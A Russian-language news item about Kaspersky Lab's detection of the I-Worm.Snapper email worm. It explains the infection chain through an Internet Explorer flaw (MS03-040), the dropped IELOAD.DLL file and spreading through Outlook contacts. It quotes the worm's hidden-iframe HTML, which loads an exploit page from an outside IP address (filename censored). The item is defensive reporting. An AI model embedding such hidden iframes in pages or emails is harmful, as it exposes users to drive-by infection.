"Лаборатория Касперского" сообщает об обнаружении нового почтового червя I-Worm.Snapper, распространяющегося через интернет в виде ссылки на зараженный веб-сайт. Зараженные письма содержат в себе HTML код: <HTML><BODY><IFRAME src='http://198.170.245.129/[censored by KL].htm'
style='display:none'></IFRAME></HTML></BODY>. При обращении по данной ссылке происходит использование уязвимости Internet Explorer, описанной в бюллетене MS03-040, в результате чего в системе исполняется скриптовый троянец. Данная троянская программа извлекает из себя и устанавливает в систему основной файл червя "IELOAD.DLL". Червь представляет собой PE DLL-файл, размером около 8KB (8704 байт). Данный файл устанавливается в системный каталог Windows и запускается как системная библиотека. Червь рассылает письмо со ссылкой по всем адресам электронной почты, найденным в адресной книге MS Outlook. Для отправки писем червь использует указанный в системе SMTP сервер. Подробное описание червя появится в ближайшее время.
Исчтоник - http://www.viruslist.com